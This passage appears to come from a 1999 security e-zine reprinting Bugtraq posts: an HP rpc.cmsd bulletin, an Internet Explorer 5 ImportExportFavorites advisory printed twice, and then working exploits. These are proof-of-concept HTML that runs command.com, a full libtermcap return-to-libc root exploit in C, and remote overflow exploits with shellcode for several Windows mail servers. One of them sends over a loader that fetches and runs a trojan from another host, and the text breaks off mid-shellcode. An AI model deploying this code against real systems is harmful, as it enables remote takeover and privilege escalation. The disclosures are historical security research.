54.0 HPSBUX9908-102 Security Vulnerability in rpc.cmsd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: [support_feedback@us-support.external.hp.com: Security Bulletins
Digest]
To: BUGTRAQ@SECURITYFOCUS.COM
[support_feedback@us-support.ex1.ems Content-Type: text/plain; charset=us-ascii
*** PGP Signature Status: unknown
*** Signer: Unknown, Key ID xBE7497F1
*** Signed: 9/9/99 6:01:14 AM
*** Verified: 9/13/99 11:56:21 AM
*** BEGIN PGP VERIFIED MESSAGE ***
----- Forwarded message from HP Electronic Support Center <support_feedback@us-support.external.hp.com> -----
Date: Thu, 9 Sep 1999 05:07:01 -0700 (PDT)
Subject: Security Bulletins Digest
From: support_feedback@us-support.external.hp.com (HP Electronic Support Center )
To: security_info@us-support.external.hp.com
Reply-To: support_feedback@us-support.external.hp.com
Errors-To: support_errors@us-support.external.hp.com
HP Support Information Digests
===============================================================================
o HP Electronic Support Center World Wide Web Service
---------------------------------------------------
If you subscribed through the HP Electronic Support Center and would
like to be REMOVED from this mailing list, access the
HP Electronic Support Center on the World Wide Web at:
http://us-support.external.hp.com
Login using your HP Electronic Support Center User ID and Password.
Then select Support Information Digests. You may then unsubscribe from the
appropriate digest.
===============================================================================
Digest Name: Daily Security Bulletins Digest
Created: Thu Sep 9 3:00:02 PDT 1999
Table of Contents:
Document ID Title
--------------- -----------
HPSBUX9908-102 Security Vulnerability in rpc.cmsd
The documents are listed below.
-------------------------------------------------------------------------------
Document ID: HPSBUX9908-102
Date Loaded: 19990908
Title: Security Vulnerability in rpc.cmsd
-------------------------------------------------------------------------
**REVISED 01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00102, 30 Aug 1999
Last Revised: 08 Sept 1999
-------------------------------------------------------------------------
The information in the following Security Bulletin should be acted upon
as soon as possible. Hewlett-Packard Company will not be liable for any
consequences to any customer resulting from customer's failure to fully
implement instructions in this Security Bulletin as soon as possible.
-------------------------------------------------------------------------
PROBLEM: Buffer overflow vulnerability in the CDE Calendar Manager
Service Daemon, rpc.cmsd.
PLATFORM: HP-9000 Series 700/800 HP-UX releases 10.2X, 10.30, 11.00.
DAMAGE: Allows remote and local users to execute arbitrary code with
root privileges.
SOLUTION: **REVISED 01**
Install the applicable patch.
AVAILABILITY: The patches are available now.
CHANGE SUMMARY: This revision affects only HP-UX 10.24 (VVOS).
-------------------------------------------------------------------------
I.
A. Background
This problem has been reported in CERT Advisory CA-99-08.
B. Fixing the problem - Install the applicable patch:
For HP-UX release 10.20 PHSS_19482;
------>>>> For HP-UX release 10.24 PHSS_19702;
For HP-UX release 11.00 PHSS_19483.
There are significant patch dependencies for these patches.
Note: HP-UX release 10.30 was a development release prior to
the availability of HP-UX release 11.00. HP-UX release
10.30 will not be patched.
C. To subscribe to automatically receive future NEW HP Security
Bulletins from the HP Electronic Support Center via electronic
mail, do the following:
Use your browser to get to the HP Electronic Support Center page
at:
http://us-support.external.hp.com
(for US, Canada, Asia-Pacific, & Latin-America)
http://europe-support.external.hp.com (for Europe)
Login with your user ID and password (or register for one).
Remember to save the User ID assigned to you, and your password.
Once you are in the Main Menu:
To -subscribe- to future HP Security Bulletins,
click on "Support Information Digests".
To -review- bulletins already released from the main Menu,
click on the "Search Technical Knowledge Database."
Near the bottom of the next page, click on "Browse the HP
Security Bulletin Archive".
Once in the archive there is another link to our current Security
Patch Matrix. Updated daily, this matrix categorizes security
patches by platform/OS release, and by bulletin topic.
The security patch matrix is also available via anonymous ftp:
us-ffs.external.hp.com
~ftp/export/patches/hp-ux_patch_matrix
D. To report new security vulnerabilities, send email to
security-alert@hp.com
Please encrypt any exploit information using the security-alert
PGP key, available from your local key server, or by sending a
message with a -subject- (not body) of 'get key' (no quotes) to
security-alert@hp.com.
Permission is granted for copying and circulating this Bulletin to
Hewlett-Packard (HP) customers (or the Internet community) for the
purpose of alerting them to problems, if and only if, the Bulletin
is not edited or changed in any way, is attributed to HP, and
provided such reproduction and/or distribution is performed for
non-commercial purposes.
Any other use of this information is prohibited. HP is not liable
for any misuse of this information by any third party.
________________________________________________________________________
-----End of Document ID: HPSBUX9908-102--------------------------------------
----- End forwarded message -----
--
Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick
Pine Internet B.V. PGP key ID BE7497F1
Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/
-- Pine Security Digest - http://security.pine.nl/ (Dutch) ----
Excuse of the day: Dumb terminal
*** END PGP VERIFIED MESSAGE ***
@HWA
55.0 IE 5.0 security vulnerabilities - ImportExportFavorites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: IE 5.0 security vulnerabilities - ImportExportFavorites - at
least creating and overwriting files, probably executing programs
To: BUGTRAQ@SECURITYFOCUS.COM
Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
Internet Explorer 5.0 under Windows 95/NT 4.0 (suppose Win98 is
vulnerable)
allows creating and overwriting local files and in SOME cases putting
content in them using the window.external.ImportExportFavorites()
method.
In SOME cases putting content in the file is possible which means
arbitrary programs may be executed.
Details:
The problem is the window.external.ImportExportFavorites() method, which
is used to
import and export bookmarks from and to Netscape Communicator.
The bigger problem is it allows creating and overwriting files, which
obviously leads to a dangerous DoS attack.
One may overwrite critical files which may lead to reinstalling Windows.
Example of this is:
<SCRIPT>
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
which will create a file c:\fav.hta, containing IE's favorites without
asking the user, just notifying him the operation is successfull.
In SOME cases, HTML code may be injected in the exported file by
importing a specially
designed HTML file. The file to be imported may reside on a samba or
Windows file server and may be accessed by Microsoft Networking.
The difficult part is this must be exported by using only the <A> tag,
but HTML Applications help again.
I have verified importing on a Windows NT 4.0 box directly connected to
Internet and it worked fine.
But I could not reproduce importing favorites with Windows 95 connected
to Internet via dial-up, I do not have enough network resources to
investigate further.
I SHALL MUCH APPRECIATE SOME NETWORK GURU EXPLAIN ME WHY IMPORTING USING
MICROSOFT NETWORKING DOES NOT WORK IN SOME CASES
AND CONFIRM OR DENY THE POSSIBLILTY OF IMPORTING FAVORITES FROM A
NETWORK FILE SEVER.
It is possible to import the file using "http" protocol, but then the
user must click the default button YES,
Microsoft does not warn about any security problems in this case.
So the code looks like this:
In a HTML file:
------------------------------------------------------------------
<SCRIPT>
// you must change the IP or make the file local !!!!!!!!!!
window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp");
// Sure, the StartUp folder is better
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
------------------------------------------------------------------
In the imported file (fav.imp), residing on a samba or Windows server
without authentication:
-------------------------------------------------------------------
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL>
<DT><A HREF="#" STYLE="left:expression(eval('f= new
ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo
Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT
created\');window.close();'));" ADD_DATE="923225094"
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A>
<DT><A HREF="#" STYLE="left:expression(eval('a=new
ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program
started\');window.close()'));" ADD_DATE="923225094"
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A>
</DL>
-------------------------------------------------------------------
To see the effect start c:\fav.hta (it may be placed in the StartUp
folder and executed automatically)
This vulnerability can be exploited via email or Usenet message using
window.open().
The user must have installed file sharing in order remote importing to
work.
Workaround:
Disable Active Scripting
Demonstration is available at http://www.nat.bg/~joro/imp.html
Regards,
Georgi Guninski
http://www.nat.bg/~joro
Subject: IE 5.0 security vulnerabilities - ImportExportFavorites - at
least creating and overwriting files, probably executing programs
To: BUGTRAQ@SECURITYFOCUS.COM
Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
Internet Explorer 5.0 under Windows 95/NT 4.0 (suppose Win98 is
vulnerable)
allows creating and overwriting local files and in SOME cases putting
content in them using the window.external.ImportExportFavorites()
method.
In SOME cases putting content in the file is possible which means
arbitrary programs may be executed.
Details:
The problem is the window.external.ImportExportFavorites() method, which
is used to
import and export bookmarks from and to Netscape Communicator.
The bigger problem is it allows creating and overwriting files, which
obviously leads to a dangerous DoS attack.
One may overwrite critical files which may lead to reinstalling Windows.
Example of this is:
<SCRIPT>
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
which will create a file c:\fav.hta, containing IE's favorites without
asking the user, just notifying him the operation is successfull.
In SOME cases, HTML code may be injected in the exported file by
importing a specially
designed HTML file. The file to be imported may reside on a samba or
Windows file server and may be accessed by Microsoft Networking.
The difficult part is this must be exported by using only the <A> tag,
but HTML Applications help again.
I have verified importing on a Windows NT 4.0 box directly connected to
Internet and it worked fine.
But I could not reproduce importing favorites with Windows 95 connected
to Internet via dial-up, I do not have enough network resources to
investigate further.
I SHALL MUCH APPRECIATE SOME NETWORK GURU EXPLAIN ME WHY IMPORTING USING
MICROSOFT NETWORKING DOES NOT WORK IN SOME CASES
AND CONFIRM OR DENY THE POSSIBLILTY OF IMPORTING FAVORITES FROM A
NETWORK FILE SEVER.
It is possible to import the file using "http" protocol, but then the
user must click the default button YES,
Microsoft does not warn about any security problems in this case.
So the code looks like this:
In a HTML file:
------------------------------------------------------------------
<SCRIPT>
// you must change the IP or make the file local !!!!!!!!!!
window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp");
// Sure, the StartUp folder is better
window.external.ImportExportFavorites(0,"c:\\fav.hta");
</SCRIPT>
------------------------------------------------------------------
In the imported file (fav.imp), residing on a samba or Windows server
without authentication:
-------------------------------------------------------------------
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<DL>
<DT><A HREF="#" STYLE="left:expression(eval('f= new
ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo
Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT
created\');window.close();'));" ADD_DATE="923225094"
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A>
<DT><A HREF="#" STYLE="left:expression(eval('a=new
ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program
started\');window.close()'));" ADD_DATE="923225094"
LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A>
</DL>
-------------------------------------------------------------------
To see the effect start c:\fav.hta (it may be placed in the StartUp
folder and executed automatically)
This vulnerability can be exploited via email or Usenet message using
window.open().
The user must have installed file sharing in order remote importing to
work.
Workaround:
Disable Active Scripting
Demonstration is available at http://www.nat.bg/~joro/imp.html
Regards,
Georgi Guninski
http://www.nat.bg/~joro
@HWA
56.0 libtermcap<2.0.8-15 sploit by typo@scene.at
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
// yet another lame libtermcap<2.0.8-15 sploit by typo@scene.at (libc jumpback)
// only made this to bypass nonexecutable stack patches - http://teso.scene.at/
// Redhat 6 offsets (i only needed these)
int sys = 0x401bca40; // system
int sh = 0x4025ab12; // /bin/sh
int exi = 0x4020b910; // _exit
int ran = 0x401b9928; // random offset in libc
int eip = 2136;
#define fil "/tmp/teso_termcap"
#define xte "/usr/X11R6/bin/xterm"
#define entry "xterm|"
int main(int argc, char **argv) {
char *buf;
int fd, buflen;
argv++;
if (argc>1) // dec,!hex args
sys = atoi(*(argv++));
if (argc>2)
sh = atoi(*(argv++));
if (argc>3)
exi = atoi(*(argv++));
if (argc>4)
eip = atoi(*(argv++));
buflen = eip + 20;
buf = (char *) malloc(buflen);
memset(buf, 'x', buflen);
buf[buflen] = 0;
memcpy(buf, entry, strlen(entry));
memcpy (buf+buflen-4,":\\y",3);
memcpy(buf+eip,&sys,4);
memcpy(buf+eip+4,&exi,4);
memcpy(buf+eip+8,&sh,4);
memcpy(buf+eip+12,&ran,4);
if ( (fd = open(fil, O_WRONLY|O_CREAT|O_TRUNC, "644"))<0) {
perror("cannot create file");
exit(EXIT_FAILURE);
}
write(fd,buf,buflen);
close(fd);
free(buf);
setenv("TERMCAP", fil, 1);
execl(xte, "xterm", NULL);
exit(EXIT_SUCCESS);
}
@HWA
57.0 Various buffer overflows in Windows POP3/SMTP servers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Many kind of POP3/SMTP server softwares for Windows have buffer
overflow bug
To: BUGTRAQ@SECURITYFOCUS.COM
Many kind of POP3/SMTP server softwares for Windows have buffer overflow bug
(by The Shadow Penguin Securuty http://shadowpenguin.backsection.net)
1. Introduction
I confirmed many kind of POP3/SMTP servers for Windows which are published on
"SOFT-SEEK.com" contain the buffer overflow bugs. I list the softwares which
have buffer overflow bug, I also publish the exploit programs for some software.
2. POP3/SMTP server softwares which have buffer overflow bugs
Software Version Service Overflow Point
-------------------------------------------------------
@Work SmartServer3 3.51 SMTP long MAIL FROM:
CMail Server 2.3 SP2 SMTP long MAIL FROM:
Personal Mail Server 3.09 SMTP long MAIL FROM: (I've notified to developer)
Tiny FTP daemon 0.51 POP3 long USER (I've notified, Now fixed)
Internet Anywhere 2.2.2 POP3 long USER
FuseMail 2.7 POP3 long USER,PASS
aVirt Mail Server 3.3 POP/SMTP long MAIL FROM:,long USER
If the host recives the packet which contains the exploit code, the host has been
cracked by any instructions which are coded in the exploit code. We show the
demonstration programs which execute any command on the victim host. For the proof
of the risk of intrusion, I also publish the exploit program for
"Personal Mail Server" that can send a prepared program to victim host and execute
it. If the trojan program is sent, the victim machine will be controlled remotely.
If the host receives the packet which contains the exploit code, the host will
execute any instructions that is written in the exploit code. We show the
demonstration programs which execute any command on the victim host. For the
proof of the risk of intrusion, I publish the exploit program for
"Personal Mail Server" that can send a trojan program which is prepared in the
attacker host. Of course, it can be executed remotely. If the trojan program is
sent, the victim machine will be controlled remotely.
3. Exploit
I coded the exploits for the following softwares:
(1) @Work SmartServer3
(2) CMail Server
(3) FuseMail 2.7
(4) Personal Mail Server
(5) Tiny FTP daemon
(5) is now fixed, I publish the exploit program for (1)-(4)
-------------------
(1) @Work SmartServer3
/*=============================================================================
NetcPlus SmartServer3 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 2000
#define SMTP_PORT 25
#define RETADR 1167
#define JMPADR 1163
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF,0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
exploit_code[65]=strlen(cmdbuf+23);
memset(buf,0x90,BUFSIZE);
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[2000]=0;
sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
sleep(100);
close(sockfd);
}
-------------------
(2) CMail Server
/*=============================================================================
CMAIL Server 2.3 SP2 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 2000
#define SMTP_PORT 25
#define RETADR 626
#define JMPADR 622
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF, 0x00};
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
exploit_code[65]=strlen(cmdbuf+23);
memset(buf,0x90,BUFSIZE);
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
buf[BUFSIZE]=0;
sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: aa <%s@aa.com>\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
sleep(100);
close(sockfd);
}
-------------------
(4) FuseMail 2.7
/*=============================================================================
FuseMail Version 2.7 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 1159
#define RETADR 1074
#define FTP_PORT 110
#define JMP_ESP 0xbff7a027
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[3000],buf[1500];
int sockfd,i,ip;
if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(FTP_PORT);
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
strcat(exploit_code,cmdbuf);
memset(buf,'a',BUFSIZE);
buf[BUFSIZE]=0;
ip=JMP_ESP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
sprintf(packetbuf,"USER %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
memset(packetbuf,0,1024);
sprintf(packetbuf,"PASS sample\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
close(sockfd);
}
-------------------
(4) Personal Mail Server
Prog.1 : This program sends the very small client program which can execute the trojan
after the translation from other host.
Prog.2 : Program Translation Server. The Program Translation Server which is used by Prog.1
Prog.1
/*=============================================================================
Personal Mail Server Version 3.072-3.09 Exploit for Windows98
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#define BUFSIZE 4000
#define SMTP_PORT 25
#define RETADR 267
#define JMPADR 263
#define JMPOFS 6
#define EIP 0xbff7a06b
#define NOP 0x90
#define JMPS 0xeb
unsigned char exploit_code[700]={
0xEB,0x58,0x5F,0x32,0xC0,0x8B,0xDF,0x33,0xC9,0xB1,0x09,0xFE,0xC1,0x03,0xD9,0x88,
0x03,0x88,0x47,0x16,0x88,0x47,0x21,0x88,0x47,0x28,0x88,0x47,0x30,0x88,0x47,0x35,
0x88,0x47,0x41,0x88,0x47,0x47,0x88,0x47,0x4E,0x88,0x47,0x55,0x88,0x47,0x58,0x88,
0x47,0x5E,0x88,0x47,0x65,0x88,0x47,0x6A,0x8B,0xC7,0x50,0xB8,0x50,0x77,0xF7,0xBF,
0xFF,0xD0,0x89,0x47,0x6E,0x8B,0xC7,0x33,0xC9,0xB1,0x0B,0x03,0xC1,0x50,0xB8,0x50,
0x77,0xF7,0xBF,0xFF,0xD0,0x89,0x47,0x72,0xEB,0x02,0xEB,0x72,0x8B,0xC7,0x33,0xC9,
0xB1,0x17,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0x33,0xC0,0xB0,0x02,0x50,0xFF,
0xD6,0x57,0x33,0xC9,0xB1,0x82,0x03,0xF9,0x33,0xC9,0x66,0xB9,0x90,0x01,0x33,0xC0,
0xF3,0xAA,0x5F,0x8B,0xC7,0x33,0xC9,0xB1,0x22,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,
0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,0x40,0x50,0x40,0x50,0xFF,
0xD6,0x89,0x47,0x76,0x8B,0xDF,0x33,0xC9,0xB1,0x82,0x03,0xD9,0xC6,0x03,0x02,0x66,
0xC7,0x43,0x02,0x1B,0x58,0xC7,0x43,0x04,0xEE,0xEE,0xEE,0xEE,0xEB,0x02,0xEB,0x56,
0x8B,0xC7,0x33,0xC9,0xB1,0x29,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0xB0,0x10,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,
0x03,0xC1,0x50,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x42,0x03,0xC1,
0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,
0xC9,0xB1,0x56,0x03,0xC1,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
0xD6,0x89,0x47,0x7A,0xEB,0x02,0xEB,0x63,0x8B,0xC7,0x33,0xC9,0xB1,0x31,0x03,0xC1,
0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,
0x66,0xB8,0xE8,0x03,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0x77,
0x76,0xFF,0xD6,0x89,0x47,0x7E,0x33,0xDB,0x3B,0xC3,0x74,0x31,0x72,0x2F,0x8B,0xC7,
0x33,0xC9,0xB1,0x48,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,
0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,0x77,0x7E,0x33,0xC0,0xB0,0x01,0x50,0x8B,0xC7,
0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0xD6,0xEB,0x9D,0xEB,0x6C,0x8B,0xC7,0x33,
0xC9,0xB1,0x36,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,
0x8B,0xF0,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x4F,0x03,0xC1,0x50,
0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,
0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x5F,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x66,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
